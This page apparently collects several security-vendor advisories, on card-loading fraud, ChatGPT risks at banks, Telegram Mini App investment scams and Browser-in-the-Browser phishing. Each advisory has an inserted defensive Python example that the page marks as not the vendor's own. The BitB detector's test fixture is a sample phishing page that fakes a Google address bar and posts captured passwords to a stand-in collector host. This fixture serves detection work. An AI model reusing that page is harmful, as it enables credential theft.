Card Loading Schemes on Social Media

Learn about card loading schemes on social media, their risks, and how financial institutions can prevent fraud and protect customers.
By CTM360 Team
August 3, 2023


We have recently observed various groups on social media platforms in which individuals engage in what they call “credit or debit card loading”, “bank loading” or “gift-card loading”.

These practices involve inviting individuals to deposit/receive funds through different payment service providers and banking channels. In exchange for their deposits, participants are promised attractive returns or opportunities.

We also observed individuals on social media sharing and asking about card loading by BIN (Bank Identification Number), meaning the loading of funds onto physical or digital cards whose numbers fall within specific BIN ranges. An example of such posts is shown in the screenshot below. Because specific BIN ranges are allocated to prepaid or digital cards, those ranges are the ones targeted for loading.

Fig 1: Screenshots taken from Facebook group “Loaders and Receivers”

"Loaders" and "Receivers" are terms used to describe the roles of individuals involved in a particular type of scheme. These roles are often associated with money laundering and illegal transfer of funds. Here's what each term means:

Loader: A loader is an individual or group responsible for loading funds onto cards or other payment instruments using various means, including stolen credit card information, compromised bank accounts, or illicitly obtained funds. They may use techniques like credit card bust-out scams or unauthorized transfers to load money onto cards.

Receiver: A receiver is an individual or group who receives the loaded funds, typically through cards, and is responsible for converting or transferring the funds to the fraudsters or to the next stage in the money laundering process. The receiver may receive loaded cards, withdraw cash from ATMs, or use the cards for purchases to launder the money.

Risks involved in such Loading / Receiving schemes:

Once the target BINs are identified, funds are transferred or loaded onto the cards or accounts associated with those BINs. Depending on the card's capabilities, the cards or accounts with loaded funds can then be used for various purposes, such as making purchases, online transactions, or ATM withdrawals. Such practices can potentially be abused for fraudulent purposes leading to the following:

Credit Card Bust-Out Scams: In a bust-out scam, fraudsters obtain credit cards using stolen identities or fake information. They load these cards with funds, either through illicit means or by taking advantage of introductory offers with low or zero interest rates. Once the cards are loaded, they quickly max out the credit limit and disappear without making any payments. This leaves the legitimate cardholder or the card issuer responsible for the debt.

Money Laundering: Criminals may use credit card loading to launder money obtained through illegal activities. They load illicitly gained funds onto cards and then use those cards for legitimate purchases or withdrawals, making it difficult for law enforcement to trace the origin of the money.

Money Mule Accounts: Illegally obtained card details or hacked accounts may be exploited to swiftly transfer funds to a mule account controlled by fraudsters. The funds are then almost immediately dispersed to various colluding recipients, who in turn forward the money or convert it to cash, complicating the money trail and evading detection by anti-money laundering (AML) systems.
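The "load then disperse" pattern behind the money mule risk above can be expressed as a monitoring rule an issuer runs over its own ledger. The following Python is an added example and not CTM360's tooling: the transaction records and the prepaid BIN prefixes (999001, 999002) are constructed placeholders, and the time window, dispersal ratio and recipient-count thresholds are assumptions an institution would tune to its own data.

```python
"""Flag money-mule style 'load then disperse' behaviour in card/account transactions.

Added example, not CTM360 code. The ledger below is constructed and the prepaid BIN
prefixes are hypothetical placeholders, not real issuer ranges.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Hypothetical prepaid/digital-card BIN prefixes; an issuer would load these from its own tables.
PREPAID_BINS = {"999001", "999002"}

# Constructed sample ledger: (timestamp, account, direction, amount, counterparty, card_bin)
SAMPLE_TXNS = [
    ("2023-08-01T10:00:00", "acct-A", "in", 5000.0, "src-1", "999001"),
    ("2023-08-01T10:04:00", "acct-A", "out", 1200.0, "dst-1", "999001"),
    ("2023-08-01T10:06:00", "acct-A", "out", 1300.0, "dst-2", "999001"),
    ("2023-08-01T10:09:00", "acct-A", "out", 1400.0, "dst-3", "999001"),
    ("2023-08-01T10:12:00", "acct-A", "out", 1000.0, "dst-4", "999001"),
    ("2023-08-01T11:00:00", "acct-B", "in", 300.0, "src-2", "411111"),
    ("2023-08-01T12:00:00", "acct-B", "out", 40.0, "grocer", "411111"),
]


def _ts(value):
    return datetime.fromisoformat(value)


def find_load_and_disperse(txns, window=timedelta(minutes=30), disperse_ratio=0.8, min_recipients=3):
    """Return alerts for accounts that receive a load and push most of it out to several
    distinct recipients within `window`: the mule pattern described in the text."""
    by_account = defaultdict(list)
    for row in sorted(txns, key=lambda r: r[0]):
        by_account[row[1]].append(row)

    alerts = []
    for account, rows in by_account.items():
        for i, (ts, _, direction, amount, _, card_bin) in enumerate(rows):
            if direction != "in":
                continue
            start = _ts(ts)
            # Outbound movements that follow this load inside the window.
            outs = [r for r in rows[i + 1:] if r[2] == "out" and _ts(r[0]) - start <= window]
            dispersed = sum(r[3] for r in outs)
            recipients = {r[4] for r in outs}
            if dispersed >= disperse_ratio * amount and len(recipients) >= min_recipients:
                alerts.append({
                    "account": account,
                    "loaded": amount,
                    "dispersed": dispersed,
                    "recipients": len(recipients),
                    "prepaid_bin": card_bin in PREPAID_BINS,  # extra weight if a targeted BIN range is involved
                })
    return alerts


if __name__ == "__main__":
    for alert in find_load_and_disperse(SAMPLE_TXNS):
        print(alert)
```

In the constructed data, acct-A receives 5,000 and pushes 4,900 to four different recipients within twelve minutes on a prepaid-range card, so it is flagged; acct-B's small grocery purchase after a deposit is not. In production the same rule would be one of several scores feeding a case queue rather than an automatic block.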

Various loading/receiving schemes that we have observed are as follows:

  • Bank account loading
  • Credit or debit card loading
  • Crypto loading
  • Gift card or prepaid card loading
  • PayPal / Sendwave loading

It's important to note that credit/debit card loading itself is not inherently fraudulent. Many legitimate uses exist, such as loading funds onto cards for personal budgeting or gifting purposes. However, it is crucial for individuals and financial institutions to be vigilant about potential abuse and to implement security measures to prevent fraudulent activities.

Recommendations:

To protect financial institutions and customers from fraudulent activities involving loaders and receivers, here are some recommendations they can implement:

  1. Raise awareness by issuing notices on official channels to the customers to avoid such card-loading practices.
  2. Educate customers about the risks of loading/receiving funds from unknown sources or through suspicious methods. Encourage them to report any unauthorized or suspicious transactions promptly.
  3. Strengthen identity verification processes when opening new accounts, issuing prepaid cards, or processing transactions. This includes using multi-factor authentication and conducting thorough background checks on customers to detect potential fraudulent actors.

Recent Blogs

What is ChatGPT?

ChatGPT, an advanced AI language model created by OpenAI, is gaining popularity and attention for its ability to generate human-like responses to natural language input. Trained on large amounts of data, ChatGPT's context comprehension and relevant response generation have made it a popular choice for businesses seeking to enhance customer experience and operations.

Major technology corporations are making significant investments in Artificial Intelligence (AI). Microsoft, for instance, has declared that it will invest $10 billion in OpenAI and intends to merge ChatGPT into its Azure OpenAI suite. This will allow businesses to include AI assets, including DALL-E, a program that generates images, and Codex, which transforms natural language into code, in their technology infrastructure.

While ChatGPT has several benefits for financial institutions, such as improving customer service and automating certain tasks, it also carries risks that need to be addressed. Major banks and other institutions in the US have banned the use of ChatGPT within their organizations over concerns about sensitive information being entered into the chatbot.


Risks associated with incorporating ChatGPT

Let's delve into the potential risks that are currently being debated regarding the use of ChatGPT:

  1. Data Exposure: One potential risk of using ChatGPT in the workplace is the inadvertent exposure of sensitive data. For example, employees using ChatGPT to generate data insights and analyze large amounts of financial data could unknowingly reveal confidential information while conversing with the AI model, which could lead to breaches of privacy or security. Another observed data-exposure case is employees exposing private code by inadvertently contributing confidential information to the model's training data. This could occur if an employee includes code snippets that contain sensitive data or proprietary information, such as API keys or login credentials.
  2. Misinformation: ChatGPT can generate inaccurate or biased responses based on its programming and training data. Financial professionals should be cautious while using it to avoid spreading misinformation or relying on unreliable advice. ChatGPT’s current version was only trained on data sets available through 2021. In addition, the tool pulls online data that isn’t always accurate.
  3. Technology Dependency: While ChatGPT offers useful insights for financial decision-making, relying solely on technology may overlook human judgment and intuition. Financial professionals may misunderstand ChatGPT's recommendations or become over-reliant on it. Thus, maintaining a balance between technology and human expertise is crucial.
  4. Privacy Concerns: ChatGPT gathers a lot of personal data that users might unknowingly provide. Most AI models need large amounts of data to be trained and improved, so organizations might likewise have to process a massive amount of data to train ChatGPT. This can pose a significant risk to individuals and organizations if the information is exposed or used maliciously.

External Risks associated with ChatGPT

  1. Social Engineering: Cybercriminals can use ChatGPT to impersonate individuals or organizations and create highly personalized and convincing phishing emails, making it difficult for victims to detect the attack. This can lead to successful phishing attacks and increase the likelihood of individuals falling for the scam.
  2. Creating malicious scripts and malware: Cybercriminals can train ChatGPT on vast amounts of code to produce undetectable malware strains that can bypass traditional security defenses. By using polymorphic techniques like encryption and obfuscation, this malware can dynamically alter its code and behavior, making it challenging to analyze and identify.

Recommendations:

  • Financial institutions should establish clear policies and guidelines for using ChatGPT in the workplace to safeguard confidential information and mitigate the risks of data exposure.
  • Anonymized data should be used to train an AI model to protect the privacy of individuals and organizations whose data is being used.
  • Specific controls should be applied to how employees use information from ChatGPT in connection with their work.
  • Awareness training should be provided to employees who have access to ChatGPT on the potential risks associated with the use of the technology, including the risks of data exposure, privacy violations, and ethical concerns.
  • Restricting access to ChatGPT will limit the potential for data exposure and misuse of the technology.
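The "specific controls" recommendation above and the data-exposure risk described earlier (API keys or login credentials pasted into the chatbot) can be partly enforced with a pre-submission scanner that redacts credential-like strings before a prompt leaves the organization. The Python below is an added example, not CTM360's or any vendor's code: the regex rules are deliberately simplified illustrations of what a DLP ruleset would contain, and the sample prompt is constructed (its access key is AWS's documented placeholder key, not a live credential).

```python
"""Redact credential-like strings from text before it is sent to an external chatbot/LLM.

Added example, not CTM360 code. The patterns are simplified illustrations and the
sample prompt is constructed.
"""
import re

# Simplified, illustrative patterns; a production DLP ruleset would be broader and tuned.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key_block": re.compile(
        r"-----BEGIN [A-Z ]*PRIVATE KEY-----[\s\S]*?-----END [A-Z ]*PRIVATE KEY-----"
    ),
    "bearer_token": re.compile(r"(?i)\bbearer\s+[A-Za-z0-9\-._~+/]{20,}=*"),
    # name containing password/pwd/api_key/secret, followed by = or : and a value of 6+ chars
    "password_assignment": re.compile(
        r"(?i)(\w*(?:password|passwd|pwd|api[_-]?key|secret)\w*)\s*[=:]\s*['\"]?([^\s'\"]{6,})['\"]?"
    ),
}


def scan(text):
    """Return a list of (rule_name, matched_text) findings without modifying the text."""
    findings = []
    for name, pattern in SECRET_PATTERNS.items():
        for match in pattern.finditer(text):
            findings.append((name, match.group(0)))
    return findings


def redact(text):
    """Replace every finding with a labelled placeholder. Returns (redacted_text, findings)."""
    findings = scan(text)
    redacted = text
    for name, pattern in SECRET_PATTERNS.items():
        if name == "password_assignment":
            # keep the variable name so the snippet still makes sense to the model, drop the value
            redacted = pattern.sub(lambda m: f"{m.group(1)}=[REDACTED:{name}]", redacted)
        else:
            redacted = pattern.sub(f"[REDACTED:{name}]", redacted)
    return redacted, findings


# Constructed prompt an employee might paste; AKIAIOSFODNN7EXAMPLE is AWS's documented example key.
SAMPLE_PROMPT = '''Can you review this snippet?
AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
db_password = "hunter2hunter2"
headers = {"Authorization": "Bearer abcdefghijklmnopqrstuvwxyz0123456789"}
'''


if __name__ == "__main__":
    cleaned, found = redact(SAMPLE_PROMPT)
    print(f"{len(found)} secret(s) removed")
    print(cleaned)
```

A scanner like this sits in a proxy or browser extension in front of the chatbot; it blocks the obvious leaks but is no substitute for the policy and access restrictions listed above, since a regex cannot recognise confidential business data that has no fixed shape.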

Overview:

CTM360 has discovered a new variation of scam tactics using Telegram Mini Apps and social media ads in a Ponzi-style scheme. Scammers impersonate financial institutions, leveraging Meta Ads, Telegram Ads, and fake social media accounts to lure victims into fraudulent investment platforms.

These platforms, embedded within Telegram, present a polished interface that mimics legitimate trading sites. Victims are enticed with promises of high returns, referral bonuses, and exclusive investment opportunities. Once inside, they are encouraged to deposit cryptocurrency, believing they are engaging in real trading. However, withdrawals are consistently blocked when users attempt to cash out.

CTM360 reveals new Telegram Mini Apps scam: Scammers impersonate financial institutions, using Meta and Telegram ads along with fake social media accounts to trick victims into fraudulent Ponzi-style investment platforms

CTM360 Observations

Resource Development

Telegram Mini App

  • A Mini App in Telegram is a lightweight web application that runs within the Telegram interface, allowing users to interact with services like payments, games, or trading platforms without leaving the app.
  • Scammers embed these fake websites inside Telegram Mini Apps, making them accessible within Telegram itself.
  • Users interact with the fake platform through Telegram bots keeping them within the scam ecosystem.

Scammers also create fake websites with dedicated domains that mimic real platforms, solely for fraudulent trading, deposits, and referral scams.


Trigger

Scammers lure victims with false promises of high, risk-free returns, financial incentives like bonuses and referral rewards, and fake branding to appear credible. They create urgency with limited-time offers and countdowns to pressure quick investments.

Distribution

Scammers spread the fraud across multiple platforms:

  • Meta & Telegram Ads – Paid ads and channels drive users to fake trading platforms.
  • Telegram Bots & Channels – Used to lure victims into scam sites and mini-apps.
  • Social Media & Messaging Apps – Victims unknowingly spread the scam by inviting friends for bonuses.

By using ads, fake profiles, and victim referrals, scammers rapidly expand their reach.


Target Interaction

Impersonated and Bogus Profiles

  • Fake social media accounts are created to promote, manage and provide fake customer service to the victims
  • We have also noticed scammers impersonating financial institutions, investment platforms and other industry organizations on Telegram to lure victims.

Impersonated or Bogus Websites embedded within Telegram Mini App

  • The scam operates within a Telegram Mini App, where victims are redirected to the fake investment website.
  • The Mini App retrieves the victim’s Telegram details and gives them quick access to these fake websites without a sign-up step.
  • After signing up, victims are asked to deposit funds and trade, but withdrawals are blocked.

Motive

  • PII Harvesting – Scammers collect the victim's email address, phone number and Telegram ID during the sign-up process.
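The "quick access without sign-up" noted above works because every Telegram Mini App receives an `initData` string from the client that already carries the user's Telegram ID, name and username; the email and phone number are harvested on top of that at sign-up. The Python below is an added example, not CTM360's code or Telegram's reference code, showing what that payload contains and how a legitimate bot backend verifies it using Telegram's documented scheme (HMAC-SHA256 keyed by HMAC-SHA256("WebAppData", bot_token) over the alphabetically sorted `key=value` lines). The bot token, user record, query id and timestamps are constructed, and `build_init_data` exists only to produce a signed fixture for the demonstration.

```python
"""Parse and verify Telegram Mini App initData.

Added example, not CTM360 code. Follows Telegram's documented validation scheme;
the bot token, user record and timestamps are constructed.
"""
import hashlib
import hmac
import json
import time
from urllib.parse import parse_qsl, urlencode


def _secret_key(bot_token):
    # secret_key = HMAC_SHA256(key="WebAppData", msg=bot_token)
    return hmac.new(b"WebAppData", bot_token.encode(), hashlib.sha256).digest()


def _data_check_string(fields):
    # All fields except `hash`, sorted by key, joined as key=value lines.
    return "\n".join(f"{k}={v}" for k, v in sorted(fields.items()) if k != "hash")


def build_init_data(bot_token, fields):
    """Construct a signed initData string as the Telegram client would (fixture for the demo only)."""
    fields = dict(fields)
    fields["hash"] = hmac.new(
        _secret_key(bot_token), _data_check_string(fields).encode(), hashlib.sha256
    ).hexdigest()
    return urlencode(fields)


def verify_init_data(init_data, bot_token, max_age_seconds=86400, now=None):
    """Return the parsed fields (user decoded from JSON) if the signature is valid and
    auth_date is fresh; return None for a forged, tampered or stale payload."""
    fields = dict(parse_qsl(init_data, keep_blank_values=True))
    received = fields.get("hash", "")
    expected = hmac.new(
        _secret_key(bot_token), _data_check_string(fields).encode(), hashlib.sha256
    ).hexdigest()
    if not hmac.compare_digest(received, expected):
        return None
    now = time.time() if now is None else now
    if now - int(fields.get("auth_date", 0)) > max_age_seconds:
        return None  # replayed payload
    if "user" in fields:
        fields["user"] = json.loads(fields["user"])
    return fields


# Constructed values: not a real bot token or Telegram account.
CONSTRUCTED_BOT_TOKEN = "123456:CONSTRUCTED_EXAMPLE_TOKEN"
CONSTRUCTED_FIELDS = {
    "query_id": "AAHexampleQueryId",
    "user": json.dumps(
        {"id": 987654321, "first_name": "Sample", "username": "sample_user", "language_code": "en"},
        separators=(",", ":"),
    ),
    "auth_date": "1700000000",
}


if __name__ == "__main__":
    init_data = build_init_data(CONSTRUCTED_BOT_TOKEN, CONSTRUCTED_FIELDS)
    print("raw initData:", init_data)
    print("verified:", verify_init_data(init_data, CONSTRUCTED_BOT_TOKEN, now=1700000100))
```

The parsed `user` object is exactly what a scam Mini App obtains the moment the victim opens it, before any form is shown. The verification step is what a legitimate operator must do server-side; a fraudulent site has no reason to perform it, since it only wants the identifiers.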

Monetization

  • Payments to Cryptocurrency Wallets – Victims are tricked into transferring funds via cryptocurrency (e.g., USDT, BNB, TRX) to scam-controlled wallets.
  • Selling Data on the Dark Web – The stolen credentials, Telegram IDs, emails and phone numbers are likely sold on underground forums or leveraged for future cybercriminal activity.

Recommendations

For Individuals:

  • Avoid Telegram Mini Apps for Trading – Scammers use them to bypass security measures.
  • Verify Websites & Domains – Always check official sources before engaging in financial transactions.
  • Use 2FA on All Accounts – Protect Telegram and crypto wallets from unauthorized access.
  • Never transfer funds to an account without verifying the purpose and recipient independently.

For Businesses:

  • Scan social media, Telegram, and ad networks for scams that abuse your brand and report them accordingly.
  • Work with platforms to remove and take down fraudulent sites.
  • Educate and warn users on common fraud schemes.
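For the "verify websites and domains" and "scan for scams related to your brand" recommendations above, the following Python is an added example (not CTM360's monitoring tooling) of a first-pass triage that scores candidate domains, URLs and social handles against a brand name after folding common homoglyph substitutions. The brand "examplebank", its allowlisted domain, the suspicious-token list and every candidate name are constructed, and the homoglyph tables are deliberately partial.

```python
"""Score candidate domains and handles for brand impersonation.

Added example, not CTM360 tooling. Brand, allowlist and candidates are constructed;
the homoglyph tables are partial.
"""
import unicodedata
from difflib import SequenceMatcher

BRAND = "examplebank"                        # constructed brand name
LEGITIMATE_HOSTS = {"examplebank.com"}       # constructed allowlist of the brand's real domains
SUSPICIOUS_TOKENS = {"trade", "trading", "invest", "bonus", "official", "support", "verify", "wallet", "vip"}

# Digits/symbols commonly used in place of letters, and a few Cyrillic lookalikes (partial tables).
ASCII_HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "@": "a", "$": "s", "|": "l"})
CYRILLIC_LOOKALIKES = str.maketrans(
    {"\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c", "\u0443": "y", "\u0445": "x"}
)


def normalise(label):
    """Fold a label to the ASCII string a human would read it as."""
    folded = label.lower().translate(CYRILLIC_LOOKALIKES)
    ascii_only = unicodedata.normalize("NFKD", folded).encode("ascii", "ignore").decode()
    return ascii_only.translate(ASCII_HOMOGLYPHS)


def _host_of(candidate):
    """Reduce a URL, bare domain or @handle to the part worth comparing."""
    host = candidate.strip().lower().split("://")[-1].split("/")[0]
    return host.lstrip("@")


def score(candidate, brand=BRAND):
    """Return (best similarity to the brand, set of suspicious tokens) for a candidate."""
    host = _host_of(candidate)
    best, tokens = 0.0, set()
    for label in host.replace("_", "-").split("."):
        for piece in normalise(label).split("-"):
            if not piece:
                continue
            if piece in SUSPICIOUS_TOKENS:
                tokens.add(piece)
            best = max(best, SequenceMatcher(None, piece, brand).ratio())
    return best, tokens


def triage(candidates, threshold=0.8):
    """Return the candidates that look like the brand but are not on the allowlist."""
    flagged = []
    for cand in candidates:
        if _host_of(cand) in LEGITIMATE_HOSTS:
            continue
        similarity, tokens = score(cand)
        if similarity >= threshold:
            flagged.append({"candidate": cand, "similarity": round(similarity, 2), "tokens": sorted(tokens)})
    return flagged


# Constructed candidates: the real site, a bonus-style lookalike, a capital-I-for-l swap,
# a Cyrillic 'а' swap, a social handle with a digit swap, and an unrelated domain.
CANDIDATES = [
    "https://examplebank.com/login",
    "examplebank-trading.app",
    "exampIebank.com",
    "ex\u0430mplebank.net",
    "@examp1ebank_official",
    "weatherreport.net",
]


if __name__ == "__main__":
    for hit in triage(CANDIDATES):
        print(hit)
```

Hits from a pass like this go to an analyst for confirmation and to the platform or registrar takedown process mentioned above; the similarity threshold trades false positives against missed variants and should be tuned on the brand's own history of abuse.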

Disclaimer

The information contained in this document is meant to provide general guidance and brief information to the intended recipient pertaining to the incident and recommended action. Therefore, this information is provided "as is" without warranties of any kind, express or implied, including accuracy, timeliness, and completeness. Consequently, under NO condition shall CTM360®, its related partners, directors, principals, agents, or employees be liable for any direct, indirect, accidental, special, exemplary, punitive, consequential, or other damages or claims whatsoever including, but not limited to: loss of data, loss in profits/business, network disruption…etc., arising out of or in connection with this advisory.

For more information:

Email: monitor@ctm360.com Tel: (+973) 77 360 360

A Browser-in-the-Browser (BitB) attack is a sophisticated cyber threat involving injecting malicious code into a victim's web browser.

Threat Overview:

This code creates a secondary browser within the victim's existing browser, allowing the attacker to manipulate web content, intercept network requests, and potentially gain control over the victim's browser and system. Understanding the BitB attack is crucial for organizations to develop effective mitigation strategies.

[Screenshot, 13 Nov 2023: the phishing page as first opened]

Once the website is opened, it appears as shown above (this is the first step).

[Screenshot, 13 Nov 2023: the same page after it switches to full-screen mode]

After the page forces full-screen display mode, only the inner (fake) browser window remains visible, showing the URL chosen by the attacker.

Real-Case Scenarios of BitB Attacks:

CTM360 recently observed ongoing attack campaigns utilizing the BitB technique targeting ministries and government websites, specifically the interior ministries.

In the scenario above, the official website of MOI Singapore remains unaffected and secure. The threat actor instead carries out a phishing attack by creating a fake website. Within this fraudulent site, rather than using traditional phishing elements such as fake forms or malicious content alone, the attacker embeds a fake browser interface inside the phishing page that appears to be the genuine MOI site. When the victim accesses the site, they are presented with this embedded browser in full-screen display mode, which tricks them into submitting their sensitive information.

Attack Methodology

To execute a Browser-in-the-Browser (BitB) attack, the attacker employs tactics to lure the user into visiting a malicious or compromised website. This website contains a phishing page hosted on the attacker's server. The phishing page utilizes JavaScript code to create a simulated browser window, simulating the appearance and behavior of a legitimate browser window. Within this simulated window, various types of fraudulent activities can be displayed.

Moreover, the simulated window displays a URL of the attacker's choice, such as https://accounts.google.com or https://login.microsoftonline.com. This is achieved by modifying the simulated address bar of the pop-up window using JavaScript. It may appear to the user that the specified URL is loaded within the pop-up window, but in reality it is only shown as an image or text. The user may not notice the absence of SSL certificates or other security indicators typically present in a genuine browser window, because the full-screen display mode hides the real address bar and with it the main website’s URL.

If the user falls victim to the BitB attack and enters their login credentials into the fake login form, the information is sent to the attacker's server via an AJAX request or a concealed form submission. Subsequently, the attacker gains access to the user's account on the legitimate service or proceeds with additional malicious activities such as identity theft or account takeover.
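The indicators in the methodology above (a painted address bar showing a trusted login URL on a page served from somewhere else, a forced full-screen mode, and a credential form or script that posts to the attacker's server) can be checked mechanically on a fetched page. The Python below is an added example, not CTM360's detection logic: it parses the HTML and reports which of those indicators are present. The two sample pages and the `.invalid` hostnames are constructed fixtures.

```python
"""Heuristic scan of a fetched page for Browser-in-the-Browser indicators.

Added example, not CTM360 code. Sample pages and *.invalid hostnames are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts whose URL, shown as text inside a page served from elsewhere, suggests a painted address bar.
TRUSTED_LOGIN_HOSTS = {"accounts.google.com", "login.microsoftonline.com"}
URL_RE = re.compile(r"https?://[^\s\"'<>)]+")


class _Collector(HTMLParser):
    """Gather visible text, inline script source and forms from a page."""

    def __init__(self):
        super().__init__()
        self.texts, self.scripts, self.forms = [], [], []
        self._in_script = False
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script":
            self._in_script = True
        elif tag == "form":
            self._form = {"action": a.get("action", ""), "has_password": False}
            self.forms.append(self._form)
        elif tag == "input":
            if a.get("type", "").lower() == "password" and self._form is not None:
                self._form["has_password"] = True
            if a.get("value"):  # a read-only input is a common way to paint a fake URL
                self.texts.append(a["value"])

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
        elif tag == "form":
            self._form = None

    def handle_data(self, data):
        (self.scripts if self._in_script else self.texts).append(data)


def _host(url):
    return (urlparse(url).hostname or "").lower()


def analyse(html, page_url):
    """Return the list of BitB indicators found in `html` served from `page_url`."""
    page_host = _host(page_url)
    c = _Collector()
    c.feed(html)
    indicators = []
    shown_hosts = {_host(u) for t in c.texts for u in URL_RE.findall(t)}
    if any(h in TRUSTED_LOGIN_HOSTS and h != page_host for h in shown_hosts):
        indicators.append("spoofed_address_bar")
    script_src = "\n".join(c.scripts)
    if "requestFullscreen(" in script_src:
        indicators.append("fullscreen_request")
    if any(f["has_password"] and _host(f["action"]) not in ("", page_host) for f in c.forms):
        indicators.append("password_form_offsite")
    if re.search(r"\b(fetch|XMLHttpRequest)\b", script_src) and any(
        _host(u) not in ("", page_host) for u in URL_RE.findall(script_src)
    ):
        indicators.append("script_exfil_offsite")
    return indicators


def is_likely_bitb(html, page_url, min_indicators=2):
    return len(analyse(html, page_url)) >= min_indicators


# Constructed fixture: a page on phish-example.invalid that paints a Google address bar.
SAMPLE_BITB_PAGE = """<html><body>
<div class="window"><div class="titlebar">Sign in</div>
<div class="addressbar"><span class="url">https://accounts.google.com/signin</span></div>
<form id="login" method="post" action="https://collector-example.invalid/grab">
<input name="email"><input type="password" name="pass"><button>Next</button></form></div>
<script>document.documentElement.requestFullscreen();
document.getElementById('login').addEventListener('submit', function (e) {
  e.preventDefault();
  fetch('https://collector-example.invalid/grab', {method: 'POST', body: new FormData(e.target)});
});</script></body></html>"""

# Constructed fixture: an ordinary login page that posts to its own origin.
SAMPLE_BENIGN_PAGE = """<html><body><form method="post" action="/login">
<input name="user"><input type="password" name="pass"></form>
<script>document.getElementById('user');</script></body></html>"""


if __name__ == "__main__":
    print(analyse(SAMPLE_BITB_PAGE, "https://phish-example.invalid/"))
    print(analyse(SAMPLE_BENIGN_PAGE, "https://examplebank.invalid/"))
```

Such a check belongs in a URL-scanning or mail-gateway pipeline that already fetches suspicious pages; it is a triage aid, since a page can pass it by loading the fake chrome from a separate script file or by drawing the address bar as an image.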

Potential Threats

Browser-in-the-Browser (BitB) attacks pose several potential threats and risks to victims. Here are some of the common threats associated with BitB attacks:

  • Data Theft: Attackers can exploit BitB attacks to steal sensitive information, such as login credentials, financial details, personal data, or intellectual property. This stolen data can be used for identity theft, financial fraud, or sold on the dark web.
  • Account Takeover: By manipulating the victim's browser and intercepting login credentials, BitB attacks can lead to unauthorized access to the victim's online accounts. Attackers may gain control over email accounts, social media profiles, online banking, or other services, enabling them to impersonate the victim or perform malicious activities.
  • Malware Distribution: BitB attacks can be used as a vector to distribute malware onto the victim's system. The secondary browser created by the attacker can be used to download and execute malicious software, potentially leading to further compromise of the victim's device and sensitive data.
  • Phishing and Social Engineering: Attackers can utilize BitB attacks to create convincing phishing scenarios. By simulating legitimate websites or services, they trick users into entering their login credentials or other sensitive information, which the attacker then captures and exploits.

Mitigation

The BitB attack is a tricky and risky phishing technique that can trick even careful users and bypass typical security measures. However, there are steps you can take to protect yourself from this attack:

  • Be cautious of full-screen prompts: Exercise caution if a website unexpectedly opens a full-screen prompt or overlay. Take a moment to assess the situation and ensure that you are interacting with a legitimate website before entering any sensitive information.
  • Be vigilant about website URLs: Pay close attention to the URL before entering any sensitive information. Check for any discrepancies or variations in the domain name or spelling that may indicate a phishing site.
  • Pay attention to the details of the pop-up window, such as the size, position, appearance, and behavior of the elements. If something looks off or unusual, you should close the window and report it.
  • Use a security-focused browser extension that can detect and block such phishing attempts automatically.
  • Keep your browser up to date with the latest security patches and update whenever prompted by your browser.
  • Make sure you have 2FA enabled for all of your critical services.

CTM360 is actively monitoring this phishing campaign and taking the necessary action by disrupting the attack and suspending the malicious site/domain. If you encounter any such malicious site, please report it to business@ctm360.com.
